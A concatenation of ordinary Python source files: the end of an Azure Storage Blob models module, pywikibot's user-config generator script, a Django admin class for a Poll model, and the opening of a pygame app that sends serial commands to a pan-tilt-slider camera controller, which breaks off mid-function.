:type page_range: list[~azure.storage.blob.models.PageRange]
:param clear_range:
:type clear_range: list[~azure.storage.blob.models.ClearRange]
"""
_attribute_map = {
'page_range': {'key': 'PageRange', 'type': '[PageRange]', 'xml': {'name': 'PageRange', 'itemsName': 'PageRange'}},
'clear_range': {'key': 'ClearRange', 'type': '[ClearRange]', 'xml': {'name': 'ClearRange', 'itemsName': 'ClearRange'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(PageList, self).__init__(**kwargs)
self.page_range = kwargs.get('page_range', None)
self.clear_range = kwargs.get('clear_range', None)
class PageRange(Model):
"""PageRange.
All required parameters must be populated in order to send to Azure.
:param start: Required.
:type start: long
:param end: Required.
:type end: long
"""
_validation = {
'start': {'required': True},
'end': {'required': True},
}
_attribute_map = {
'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}},
'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}},
}
_xml_map = {
'name': 'PageRange'
}
def __init__(self, **kwargs):
super(PageRange, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.end = kwargs.get('end', None)
class QueryFormat(Model):
"""QueryFormat.
:param type: Possible values include: 'delimited', 'json'
:type type: str or ~azure.storage.blob.models.QueryFormatType
:param delimited_text_configuration:
:type delimited_text_configuration:
~azure.storage.blob.models.DelimitedTextConfiguration
:param json_text_configuration:
:type json_text_configuration:
~azure.storage.blob.models.JsonTextConfiguration
"""
_attribute_map = {
'type': {'key': 'Type', 'type': 'QueryFormatType', 'xml': {'name': 'Type'}},
'delimited_text_configuration': {'key': 'DelimitedTextConfiguration', 'type': 'DelimitedTextConfiguration', 'xml': {'name': 'DelimitedTextConfiguration'}},
'json_text_configuration': {'key': 'JsonTextConfiguration', 'type': 'JsonTextConfiguration', 'xml': {'name': 'JsonTextConfiguration'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(QueryFormat, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.delimited_text_configuration = kwargs.get('delimited_text_configuration', None)
self.json_text_configuration = kwargs.get('json_text_configuration', None)
class QueryRequest(Model):
"""the quick query body.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar query_type: Required. the query type. Default value: "SQL" .
:vartype query_type: str
:param expression: Required. a query statement
:type expression: str
:param input_serialization:
:type input_serialization: ~azure.storage.blob.models.QuerySerialization
:param output_serialization:
:type output_serialization: ~azure.storage.blob.models.QuerySerialization
"""
_validation = {
'query_type': {'required': True, 'constant': True},
'expression': {'required': True},
}
_attribute_map = {
'query_type': {'key': 'QueryType', 'type': 'str', 'xml': {'name': 'QueryType'}},
'expression': {'key': 'Expression', 'type': 'str', 'xml': {'name': 'Expression'}},
'input_serialization': {'key': 'InputSerialization', 'type': 'QuerySerialization', 'xml': {'name': 'InputSerialization'}},
'output_serialization': {'key': 'OutputSerialization', 'type': 'QuerySerialization', 'xml': {'name': 'OutputSerialization'}},
}
_xml_map = {
'name': 'QueryRequest'
}
query_type = "SQL"
def __init__(self, **kwargs):
super(QueryRequest, self).__init__(**kwargs)
self.expression = kwargs.get('expression', None)
self.input_serialization = kwargs.get('input_serialization', None)
self.output_serialization = kwargs.get('output_serialization', None)
class QuerySerialization(Model):
"""QuerySerialization.
All required parameters must be populated in order to send to Azure.
:param format: Required.
:type format: ~azure.storage.blob.models.QueryFormat
"""
_validation = {
'format': {'required': True},
}
_attribute_map = {
'format': {'key': 'Format', 'type': 'QueryFormat', 'xml': {'name': 'Format'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(QuerySerialization, self).__init__(**kwargs)
self.format = kwargs.get('format', None)
class RetentionPolicy(Model):
"""the retention policy which determines how long the associated data should
persist.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Indicates whether a retention policy is enabled
for the storage service
:type enabled: bool
:param days: Indicates the number of days that metrics or logging or
soft-deleted data should be retained. All data older than this value will
be deleted
:type days: int
"""
_validation = {
'enabled': {'required': True},
'days': {'minimum': 1},
}
_attribute_map = {
'enabled': {'key': 'Enabled', 'type': 'bool', 'xml': {'name': 'Enabled'}},
'days': {'key': 'Days', 'type': 'int', 'xml': {'name': 'Days'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(RetentionPolicy, self).__init__(**kwargs)
self.enabled = kwargs.get('enabled', None)
self.days = kwargs.get('days', None)
class SequenceNumberAccessConditions(Model):
"""Additional parameters for a set of operations, such as:
PageBlob_upload_pages, PageBlob_clear_pages,
PageBlob_upload_pages_from_url.
:param if_sequence_number_less_than_or_equal_to: Specify this header value
to operate only on a blob if it has a sequence number less than or equal
to the specified.
:type if_sequence_number_less_than_or_equal_to: long
:param if_sequence_number_less_than: Specify this header value to operate
only on a blob if it has a sequence number less than the specified.
:type if_sequence_number_less_than: long
:param if_sequence_number_equal_to: Specify this header value to operate
only on a blob if it has the specified sequence number.
:type if_sequence_number_equal_to: long
"""
_attribute_map = {
'if_sequence_number_less_than_or_equal_to': {'key': '', 'type': 'long', 'xml': {'name': 'if_sequence_number_less_than_or_equal_to'}},
'if_sequence_number_less_than': {'key': '', 'type': 'long', 'xml': {'name': 'if_sequence_number_less_than'}},
'if_sequence_number_equal_to': {'key': '', 'type': 'long', 'xml': {'name': 'if_sequence_number_equal_to'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(SequenceNumberAccessConditions, self).__init__(**kwargs)
self.if_sequence_number_less_than_or_equal_to = kwargs.get('if_sequence_number_less_than_or_equal_to', None)
self.if_sequence_number_less_than = kwargs.get('if_sequence_number_less_than', None)
self.if_sequence_number_equal_to = kwargs.get('if_sequence_number_equal_to', None)
class SignedIdentifier(Model):
"""signed identifier.
All required parameters must be populated in order to send to Azure.
:param id: Required. a unique id
:type id: str
:param access_policy:
:type access_policy: ~azure.storage.blob.models.AccessPolicy
"""
_validation = {
'id': {'required': True},
}
_attribute_map = {
'id': {'key': 'Id', 'type': 'str', 'xml': {'name': 'Id'}},
'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy', 'xml': {'name': 'AccessPolicy'}},
}
_xml_map = {
'name': 'SignedIdentifier'
}
def __init__(self, **kwargs):
super(SignedIdentifier, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.access_policy = kwargs.get('access_policy', None)
class SourceModifiedAccessConditions(Model):
"""Additional parameters for a set of operations.
:param source_if_modified_since: Specify this header value to operate only
on a blob if it has been modified since the specified date/time.
:type source_if_modified_since: datetime
:param source_if_unmodified_since: Specify this header value to operate
only on a blob if it has not been modified since the specified date/time.
:type source_if_unmodified_since: datetime
:param source_if_match: Specify an ETag value to operate only on blobs
with a matching value.
:type source_if_match: str
:param source_if_none_match: Specify an ETag value to operate only on
blobs without a matching value.
:type source_if_none_match: str
:param source_if_tags: Specify a SQL where clause on blob tags to operate
only on blobs with a matching value.
:type source_if_tags: str
"""
_attribute_map = {
'source_if_modified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'source_if_modified_since'}},
'source_if_unmodified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'source_if_unmodified_since'}},
'source_if_match': {'key': '', 'type': 'str', 'xml': {'name': 'source_if_match'}},
'source_if_none_match': {'key': '', 'type': 'str', 'xml': {'name': 'source_if_none_match'}},
'source_if_tags': {'key': '', 'type': 'str', 'xml': {'name': 'source_if_tags'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(SourceModifiedAccessConditions, self).__init__(**kwargs)
self.source_if_modified_since = kwargs.get('source_if_modified_since', None)
self.source_if_unmodified_since = kwargs.get('source_if_unmodified_since', None)
self.source_if_match = kwargs.get('source_if_match', None)
self.source_if_none_match = kwargs.get('source_if_none_match', None)
self.source_if_tags = kwargs.get('source_if_tags', None)
class StaticWebsite(Model):
"""The properties that enable an account to host a static website.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Indicates whether this account is hosting a
static website
:type enabled: bool
:param index_document: The default name of the index page under each
directory
:type index_document: str
:param error_document404_path: The absolute path of the custom 404 page
:type error_document404_path: str
:param default_index_document_path: Absolute path of the default index
page
:type default_index_document_path: str
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'enabled': {'key': 'Enabled', 'type': 'bool', 'xml': {'name': 'Enabled'}},
'index_document': {'key': 'IndexDocument', 'type': 'str', 'xml': {'name': 'IndexDocument'}},
'error_document404_path': {'key': 'ErrorDocument404Path', 'type': 'str', 'xml': {'name': 'ErrorDocument404Path'}},
'default_index_document_path': {'key': 'DefaultIndexDocumentPath', 'type': 'str', 'xml': {'name': 'DefaultIndexDocumentPath'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StaticWebsite, self).__init__(**kwargs)
self.enabled = kwargs.get('enabled', None)
self.index_document = kwargs.get('index_document', None)
self.error_document404_path = kwargs.get('error_document404_path', None)
self.default_index_document_path = kwargs.get('default_index_document_path', None)
class StorageError(Model):
"""StorageError.
:param message:
:type message: str
"""
_attribute_map = {
'message': {'key': 'Message', 'type': 'str', 'xml': {'name': 'Message'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StorageError, self).__init__(**kwargs)
self.message = kwargs.get('message', None)
class StorageErrorException(HttpResponseError):
"""Server responsed with exception of type: 'StorageError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, response, deserialize, *args):
model_name = 'StorageError'
self.error = deserialize(model_name, response)
if self.error is None:
self.error = deserialize.dependencies[model_name]()
super(StorageErrorException, self).__init__(response=response)
class StorageServiceProperties(Model):
"""Storage Service Properties.
:param logging:
:type logging: ~azure.storage.blob.models.Logging
:param hour_metrics:
:type hour_metrics: ~azure.storage.blob.models.Metrics
:param minute_metrics:
:type minute_metrics: ~azure.storage.blob.models.Metrics
:param cors: The set of CORS rules.
:type cors: list[~azure.storage.blob.models.CorsRule]
:param default_service_version: The default version to use for requests to
the Blob service if an incoming request's version is not specified.
Possible values include version 2008-10-27 and all more recent versions
:type default_service_version: str
:param delete_retention_policy:
:type delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy
:param static_website:
:type static_website: ~azure.storage.blob.models.StaticWebsite
"""
_attribute_map = {
'logging': {'key': 'Logging', 'type': 'Logging', 'xml': {'name': 'Logging'}},
'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics', 'xml': {'name': 'HourMetrics'}},
'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics', 'xml': {'name': 'MinuteMetrics'}},
'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'name': 'Cors', 'itemsName': 'CorsRule', 'wrapped': True}},
'default_service_version': {'key': 'DefaultServiceVersion', 'type': 'str', 'xml': {'name': 'DefaultServiceVersion'}},
'delete_retention_policy': {'key': 'DeleteRetentionPolicy', 'type': 'RetentionPolicy', 'xml': {'name': 'DeleteRetentionPolicy'}},
'static_website': {'key': 'StaticWebsite', 'type': 'StaticWebsite', 'xml': {'name': 'StaticWebsite'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StorageServiceProperties, self).__init__(**kwargs)
self.logging = kwargs.get('logging', None)
self.hour_metrics = kwargs.get('hour_metrics', None)
self.minute_metrics = kwargs.get('minute_metrics', None)
self.cors = kwargs.get('cors', None)
self.default_service_version = kwargs.get('default_service_version', None)
self.delete_retention_policy = kwargs.get('delete_retention_policy', None)
self.static_website = kwargs.get('static_website', None)
class StorageServiceStats(Model):
"""Stats for the storage service.
:param geo_replication:
:type geo_replication: ~azure.storage.blob.models.GeoReplication
"""
_attribute_map = {
'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication', 'xml': {'name': 'GeoReplication'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StorageServiceStats, self).__init__(**kwargs)
self.geo_replication = kwargs.get('geo_replication', None)
class UserDelegationKey(Model):
"""A user delegation key.
All required parameters must be populated in order to send to Azure.
:param signed_oid: Required. The Azure Active Directory object ID in GUID
format.
:type signed_oid: str
:param signed_tid: Required. The Azure Active Directory tenant ID in GUID
format
:type signed_tid: str
:param signed_start: Required. The date-time the key is active
:type signed_start: datetime
:param signed_expiry: Required. The date-time the key expires
:type signed_expiry: datetime
:param signed_service: Required. Abbreviation of the Azure Storage service
that accepts the key
:type signed_service: str
:param signed_version: Required. The service version that created the key
:type signed_version: str
:param value: Required. The key as a base64 string
:type value: str
"""
_validation = {
'signed_oid': {'required': True},
'signed_tid': {'required': True},
'signed_start': {'required': True},
'signed_expiry': {'required': True},
'signed_service': {'required': True},
'signed_version': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'signed_oid': {'key': 'SignedOid', 'type': 'str', 'xml': {'name': 'SignedOid'}},
'signed_tid': {'key': 'SignedTid', 'type': 'str', 'xml': {'name': 'SignedTid'}},
'signed_start': {'key': 'SignedStart', 'type': 'iso-8601', 'xml': {'name': 'SignedStart'}},
'signed_expiry': {'key': 'SignedExpiry', 'type': 'iso-8601', 'xml': {'name': 'SignedExpiry'}},
'signed_service': {'key': 'SignedService', 'type': 'str', 'xml': {'name': 'SignedService'}},
'signed_version': {'key': 'SignedVersion', 'type': 'str', 'xml': {'name': 'SignedVersion'}},
'value': {'key': 'Value', 'type': 'str', 'xml': {'name': 'Value'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(UserDelegationKey, self).__init__(**kwargs)
self.signed_oid = kwargs.get('signed_oid', None)
self.signed_tid = kwargs.get('signed_tid', None)
self.signed_start = kwargs.get('signed_start', None)
self.signed_expiry = kwargs.get('signed_expiry', None)
self.signed_service = kwargs.get('signed_service', None)
self.signed_version = kwargs.get('signed_version', None)
self.value = kwargs.get('value', None)
|
py | 1a40c9920db17307cb1fc1f7e9b2b3b9c5a21276 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Script to create user-config.py."""
#
# (C) Pywikibot team, 2010-2018
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import codecs
from collections import namedtuple
import os
import re
import sys
from textwrap import fill
from generate_family_file import _import_with_no_user_config
# DISABLED_SECTIONS cannot be copied; variables must be set manually
DISABLED_SECTIONS = {'USER INTERFACE SETTINGS', # uses sys
'EXTERNAL EDITOR SETTINGS', # uses os
}
OBSOLETE_SECTIONS = {'ACCOUNT SETTINGS', # already set
'OBSOLETE SETTINGS', # obsolete
}
# Disable user-config usage as we are creating it here
pywikibot = _import_with_no_user_config('pywikibot')
config, __url__ = pywikibot.config2, pywikibot.__url__
base_dir = pywikibot.config2.base_dir
try:
console_encoding = sys.stdout.encoding
# unittests fails with "StringIO instance has no attribute 'encoding'"
except AttributeError:
console_encoding = None
# the directory in which generate_user_files.py is located
pywikibot_dir = sys.path[0]
if console_encoding is None or sys.platform == 'cygwin':
console_encoding = 'iso-8859-1'
USER_BASENAME = 'user-config.py'
PASS_BASENAME = 'user-password.py'
def change_base_dir():
"""Create a new user directory."""
while True:
new_base = pywikibot.input('New user directory? ')
new_base = os.path.abspath(new_base)
if os.path.exists(new_base):
if os.path.isfile(new_base):
pywikibot.error('there is an existing file with that name.')
continue
# make sure user can read and write this directory
if not os.access(new_base, os.R_OK | os.W_OK):
pywikibot.error('directory access restricted')
continue
pywikibot.output('Using existing directory')
else:
try:
os.mkdir(new_base, pywikibot.config2.private_files_permission)
except Exception as e:
pywikibot.error('directory creation failed: {0}'.format(e))
continue
pywikibot.output('Created new directory.')
break
if new_base == pywikibot.config2.get_base_dir(new_base):
# config would find that file
return new_base
msg = fill("""WARNING: Your user files will be created in the directory
'%(new_base)s' you have chosen. To access these files, you will either have
to use the argument "-dir:%(new_base)s" every time you run the bot, or set
the environment variable "PYWIKIBOT_DIR" equal to this directory name in
your operating system. See your operating system documentation for how to
set environment variables.""" % {'new_base': new_base}, width=76)
pywikibot.output(msg)
if pywikibot.input_yn('Is this OK?', default=False, automatic_quit=False):
return new_base
pywikibot.output('Aborting changes.')
return False
def file_exists(filename):
"""Return whether the file exists and print a message if it exists."""
if os.path.exists(filename):
pywikibot.output('{1} already exists in the target directory "{0}".'
.format(*os.path.split(filename)))
return True
return False
def get_site_and_lang(default_family='wikipedia', default_lang='en',
default_username=None, force=False):
"""
Ask the user for the family, language and username.
@param default_family: The default family which should be chosen.
@type default_family: None or str
@param default_lang: The default language which should be chosen, if the
family supports this language.
@type default_lang: None or str
@param default_username: The default username which should be chosen.
@type default_username: None or str
@return: The family, language and username
@rtype: tuple of three str
"""
known_families = sorted(pywikibot.config2.family_files.keys())
if default_family not in known_families:
default_family = None
fam = pywikibot.bot.input_list_choice(
'Select family of sites we are working on, '
'just enter the number or name',
known_families,
force=force,
default=default_family)
fam = pywikibot.family.Family.load(fam)
if hasattr(fam, 'langs'):
if hasattr(fam, 'languages_by_size'):
by_size = [code for code in fam.languages_by_size
if code in fam.langs.keys()]
else:
by_size = []
known_langs = by_size + sorted(
set(fam.langs.keys()).difference(by_size))
else:
known_langs = []
if len(known_langs) == 0:
pywikibot.output('There were no known languages found in {}.'
.format(fam.name))
default_lang = None
elif len(known_langs) == 1:
pywikibot.output('The only known language: {0}'.format(known_langs[0]))
default_lang = known_langs[0]
else:
pywikibot.output('This is the list of known languages:')
pywikibot.output(', '.join(known_langs))
if default_lang not in known_langs:
if default_lang != 'en' and 'en' in known_langs:
default_lang = 'en'
else:
default_lang = None
message = "The language code of the site we're working on"
mycode = None
while not mycode:
mycode = pywikibot.input(message, default=default_lang, force=force)
if known_langs and mycode and mycode not in known_langs:
if not pywikibot.input_yn(
fill('The language code {} is not in the list of known '
'languages. Do you want to continue?'.format(mycode)),
default=False, automatic_quit=False):
mycode = None
message = 'Username on {0}:{1}'.format(mycode, fam.name)
username = pywikibot.input(message, default=default_username, force=force)
# Escape ''s
if username:
username = username.replace("'", "\\'")
return fam.name, mycode, username
EXTENDED_CONFIG = """# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
# This is an automatically generated file. You can find more configuration
# parameters in 'config.py' file.
# The family of sites to work on by default.
#
# ‘site.py’ imports ‘families/xxx_family.py’, so if you want to change
# this variable, you need to use the name of one of the existing family files
# in that folder or write your own, custom family file.
#
# For ‘site.py’ to be able to read your custom family file, you must
# save it to ‘families/xxx_family.py’, where ‘xxx‘ is the codename of the
# family that your custom ‘xxx_family.py’ family file defines.
#
# You can also save your custom family files to a different folder. As long
# as you follow the ‘xxx_family.py’ naming convention, you can register your
# custom folder in this configuration file with the following global function:
#
# register_families_folder(folder_path)
#
# Alternatively, you can register particular family files that do not need
# to follow the ‘xxx_family.py’ naming convention using the following
# global function:
#
# register_family_file(family_name, file_path)
#
# Where ‘family_name’ is the family code (the ‘xxx’ in standard family file
# names) and ‘file_path’ is the absolute path to the target family file.
#
# If you use either of these functions to define the family to work on by
# default (the ‘family’ variable below), you must place the function call
# before the definition of the ‘family’ variable.
family = '{main_family}'
# The language code of the site we're working on.
mylang = '{main_code}'
# The dictionary usernames should contain a username for each site where you
# have a bot account. If you have a unique username for all languages of a
# family , you can use '*'
{usernames}
# The list of BotPasswords is saved in another file. Import it if needed.
# See https://www.mediawiki.org/wiki/Manual:Pywikibot/BotPasswords to know how
# use them.
{botpasswords}
{config_text}"""
SMALL_CONFIG = """# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
family = '{main_family}'
mylang = '{main_code}'
{usernames}
{botpasswords}
"""
PASSFILE_CONFIG = """# This is an automatically generated file used to store
# BotPasswords.
#
# As a simpler (but less secure) alternative to OAuth, MediaWiki allows bot
# users to uses BotPasswords to limit the permissions given to a bot.
# When using BotPasswords, each instance gets keys. This combination can only
# access the API, not the normal web interface.
#
# See https://www.mediawiki.org/wiki/Manual:Pywikibot/BotPasswords for more
# information.
{botpasswords}"""
def parse_sections():
"""Parse sections from config2.py file.
config2.py will be in the pywikibot/ directory relative to this
generate_user_files script.
@return: a list of ConfigSection named tuples.
@rtype: list
"""
data = []
ConfigSection = namedtuple('ConfigSection', 'head, info, section')
install = os.path.dirname(os.path.abspath(__file__))
with codecs.open(os.path.join(install, 'pywikibot', 'config2.py'),
'r', 'utf-8') as config_f:
config_file = config_f.read()
result = re.findall(
'^(?P<section># #{5,} (?P<head>[A-Z][A-Z_ ]+[A-Z]) #{5,}\r?\n'
'(?:^#?\r?\n)?' # There may be an empty or short line after header
'(?P<comment>(?:^# .+?)+)' # first comment is used as help string
'^.*?)' # catch the remaining text
'^(?=# #{5,}|# ={5,})', # until section end marker
config_file, re.MULTILINE | re.DOTALL)
for section, head, comment in result:
info = ' '.join(text.strip('# ') for text in comment.splitlines())
data.append(ConfigSection(head, info, section))
return data
def copy_sections():
"""Take config sections and copy them to user-config.py.
@return: config text of all selected sections.
@rtype: str
"""
result = []
sections = parse_sections()
# copy settings
for section in filter(lambda x: x.head not in (DISABLED_SECTIONS
| OBSOLETE_SECTIONS),
sections):
result.append(section.section)
return ''.join(result)
def create_user_config(main_family, main_code, main_username, force=False):
"""
Create a user-config.py in base_dir.
Create a user-password.py if necessary.
"""
_fnc = os.path.join(base_dir, USER_BASENAME)
_fncpass = os.path.join(base_dir, PASS_BASENAME)
useritem = namedtuple('useritem', 'family, code, name')
userlist = []
if force and not config.verbose_output:
if main_username:
userlist = [useritem(main_family, main_code, main_username)]
else:
while True:
userlist += [useritem(*get_site_and_lang(
main_family, main_code, main_username, force=force))]
if not pywikibot.input_yn('Do you want to add any other projects?',
force=force,
default=False, automatic_quit=False):
break
# For each different username entered, ask if user wants to save a
# BotPassword (username, BotPassword name, BotPassword pass)
msg = fill('See {}/BotPasswords to know how to get codes.'
'Please note that plain text in {} and anyone with read '
'access to that directory will be able read the file.'
.format(__url__, _fncpass))
botpasswords = []
userset = {user.name for user in userlist}
for username in userset:
if pywikibot.input_yn('Do you want to add a BotPassword for {}?'
.format(username), force=force, default=False):
if msg:
pywikibot.output(msg)
msg = None
message = 'BotPassword\'s "bot name" for {}'.format(username)
botpasswordname = pywikibot.input(message, force=force)
message = 'BotPassword\'s "password" for "{}" ' \
'(no characters will be shown)' \
.format(botpasswordname)
botpasswordpass = pywikibot.input(message, force=force,
password=True)
if botpasswordname and botpasswordpass:
botpasswords.append((username, botpasswordname,
botpasswordpass))
if not userlist: # Show a sample
usernames = "# usernames['{}']['{}'] = u'MyUsername'".format(
main_family, main_code)
else:
usernames = '\n'.join(
"usernames['{user.family}']['{user.code}'] = u'{user.name}'"
.format(user=user) for user in userlist)
# Arbitrarily use the first key as default settings
main_family, main_code = userlist[0].family, userlist[0].code
botpasswords = '\n'.join(
"('{0}', BotPassword('{1}', '{2}'))".format(*botpassword)
for botpassword in botpasswords)
config_text = copy_sections()
if config_text:
config_content = EXTENDED_CONFIG
else:
pywikibot.output('Creating a small variant of user-config.py')
config_content = SMALL_CONFIG
try:
# Finally save user-config.py
with codecs.open(_fnc, 'w', 'utf-8') as f:
f.write(config_content.format(
main_family=main_family,
main_code=main_code,
usernames=usernames,
config_text=config_text,
botpasswords='password_file = ' + ('"{}"'.format(PASS_BASENAME)
if botpasswords
else 'None')))
pywikibot.output("'%s' written." % _fnc)
except BaseException:
if os.path.exists(_fnc):
os.remove(_fnc)
raise
if botpasswords:
# Save if necessary user-password.py
try:
# First create an empty file with good permissions, before writing
# in it
with codecs.open(_fncpass, 'w', 'utf-8') as f:
f.write('')
pywikibot.tools.file_mode_checker(_fncpass, mode=0o600,
quiet=True)
with codecs.open(_fncpass, 'w', 'utf-8') as f:
f.write(PASSFILE_CONFIG.format(botpasswords=botpasswords))
pywikibot.tools.file_mode_checker(_fncpass, mode=0o600)
pywikibot.output("'{0}' written.".format(_fncpass))
except EnvironmentError:
os.remove(_fncpass)
raise
def ask_for_dir_change(force):
"""Ask whether the base directory is has to be changed.
Only give option for directory change if user-config.py or user-password
already exists in the directory. This will repeat if user-config.py also
exists in the requested directory.
@param force: Skip asking for directory change
@type force: bool
@return: whether user file or password file exists already
@rtype: tuple of bool
"""
global base_dir
pywikibot.output('\nYour default user directory is "{}"'.format(base_dir))
while True:
# Show whether file exists
userfile = file_exists(os.path.join(base_dir, USER_BASENAME))
passfile = file_exists(os.path.join(base_dir, PASS_BASENAME))
if force and not config.verbose_output or not (userfile or passfile):
break
if pywikibot.input_yn(
'Would you like to change the directory?',
default=True, automatic_quit=False, force=force):
new_base = change_base_dir()
if new_base:
base_dir = new_base
else:
break
return userfile, passfile
def main(*args):
"""
Process command line arguments and generate user-config.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: unicode
"""
# set the config family and mylang values to an invalid state so that
# the script can detect that the command line arguments -family & -lang
# were used and and handle_args has updated these config values,
# and 'force' mode can be activated below.
(config.family, config.mylang) = ('wikipedia', None)
local_args = pywikibot.handle_args(args)
if local_args:
pywikibot.output('Unknown arguments: %s' % ' '.join(local_args))
return False
pywikibot.output('You can abort at any time by pressing ctrl-c')
if config.mylang is not None:
force = True
pywikibot.output('Automatically generating user-config.py')
else:
force = False
# Force default site of en.wikipedia
config.family, config.mylang = 'wikipedia', 'en'
username = config.usernames[config.family].get(config.mylang)
try:
has_userfile, has_passfile = ask_for_dir_change(force)
if not (has_userfile or has_passfile):
create_user_config(config.family, config.mylang, username,
force=force)
except KeyboardInterrupt:
pywikibot.output('\nScript terminated by user.')
# Creation of user-fixes.py has been replaced by an example file.
if __name__ == '__main__':
main()
|
py | 1a40ca2077364156a7eb4b41dcdb2764c51d852b | from django.contrib import admin
from .models import Poll
@admin.register(Poll)
class PollAdmin(admin.ModelAdmin):
list_display = ('name', 'last_name', 'email', 'last_module', 'phone_number')
|
py | 1a40ca4831047eeaa2624ad4ac2cb6ddcc38cbc6 | import pygame
from pygame.cursors import tri_left
import pygame_gui
import time
import serial.tools.list_ports
import os, sys
import math
from collections import deque
from pygame_gui import UIManager
from pygame_gui.elements import UIButton
from pygame_gui.elements import UITextEntryLine
from pygame_gui.elements import UIDropDownMenu
from pygame_gui.elements import UILabel
from pygame_gui.elements.ui_text_box import UITextBox
from pygame_gui.windows import UIConfirmationDialog
from serial import *
from pathlib import Path
def find_data_file(filename):
if getattr(sys, "frozen", False):
datadir = os.path.dirname(sys.executable)
else:
datadir = os.path.dirname(__file__)
return os.path.join(datadir, filename)
try: # Needed for macOS "py2app"
base_path = Path(__file__).parent
image_path = (base_path / "./PTSApp-Icon.png").resolve()
gameIcon = pygame.image.load(image_path)
pygame.display.set_icon(gameIcon)
except: # Needed for Windows "cx_freeze"
imageFile = "PTSApp-Icon.png"
imageFilePath = find_data_file(imageFile)
gameIcon = pygame.image.load(imageFilePath)
pygame.display.set_icon(gameIcon)
pygame.font.init()
myfont = pygame.font.SysFont('Trebuchet MS', 30)
myfontsmall = pygame.font.SysFont('Trebuchet MS', 20)
clk = pygame.time.Clock()
interval = 200
intervalReport = 100
baudRate = 38400 #57600 or 38400
speedFastX = 's20'
speedFastY = 'S20'
speedFastZ = 'X60'
speedSlowX = 's10'
speedSlowY = 'S10'
speedSlowZ = 'X30'
ser = ''
serBuffer = ''
serialText = ''
joystick = ''
joystickName = ''
button0Pressed = False
button1Pressed = False
button2Pressed = False
button3Pressed = False
button4Pressed = False
button5Pressed = False
button6Pressed = False
button7Pressed = False
button8Pressed = False
button9Pressed = False
button10Pressed = False
button11Pressed = False
button12Pressed = False
button13Pressed = False
button14Pressed = False
button15Pressed = False
button16Pressed = False
pos1set = False
pos2set = False
pos3set = False
pos4set = False
pos5set = False
pos6set = False
pos1run = False
pos2run = False
pos3run = False
pos4run = False
pos5run = False
pos6run = False
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
speedIsFast = True
speedRec = False
blinkSet = False
canSendReport = False
textBoxJoystickNames = None
joyCircle_draging = False
sliderCircle_draging = False
offset_x = 0.0
sliderOffset_x = 0.0
offset_y = 0.0
sliderOffset_y = 0.0
textBoxSerial = None
arr = []
oldAxisX = 0
oldAxisY = 0
oldAxisZ = 0
axisX = 0
axisY = 0
axisZ = 0
data = bytearray(7)
hat = ()
oldHatX = 0
oldHatY = 0
previousTime = time.time()
RED = (255, 0, 0)
GREEN = (0, 255, 0)
OFF = (33, 40, 45)
mouseBorder = 360
radius = 15
mouseMoving = False
joyXreadDOT = 0.0
joyYreadDOT = 0.0
joyZreadDOT = 0.0
panKeyPresseed = False
tiltKeyPresseed = False
sliderKeyPresseed = False
isZooming = False
colour_light = (99,104,107)
colour_dark = (76,80,82)
colour = (255,255,255)
zoomINtext = myfontsmall.render('IN' , True , colour)
zoomOUTtext = myfontsmall.render('OUT' , True , colour)
textsurfaceW = myfont.render('w', False, (89, 89, 89))
textsurfaceA = myfont.render('a', False, (89, 89, 89))
textsurfaceS = myfont.render('s', False, (89, 89, 89))
textsurfaceD = myfont.render('d', False, (89, 89, 89))
textsurfaceLeft = myfont.render(',', False, (89, 89, 89))
textsurfaceRight = myfont.render('.', False, (89, 89, 89))
resolution = (1200, 660)
fullscreen = False
pygame.init()
pygame.display.set_caption("PTSApp")
previousTicks = pygame.time.get_ticks() + interval
previousTicksReport = pygame.time.get_ticks() + intervalReport
def sendUP1():
temp='^T1'
sendSerial(temp)
def sendDOWN1():
temp='^T-1'
sendSerial(temp)
def sendLEFT1():
temp='^P-0.5'
sendSerial(temp)
def sendRIGHT1():
temp='^P0.5'
sendSerial(temp)
def sendUP10():
temp='^T10'
sendSerial(temp)
def sendDOWN10():
temp='^T-10'
sendSerial(temp)
def sendLEFT10():
temp='^P-10'
sendSerial(temp)
def sendRIGHT10():
temp='^P10'
sendSerial(temp)
def sendRESETpos():
temp='^h'
sendSerial(temp)
def sendSR1():
temp='^L10'
sendSerial(temp)
def sendSR10():
temp='^L100'
sendSerial(temp)
def sendSL1():
temp='^L-10'
sendSerial(temp)
def sendSL10():
temp='^L-100'
sendSerial(temp)
def sendZOOMin():
temp='^Z'
sendSerial(temp)
def sendZOOMout():
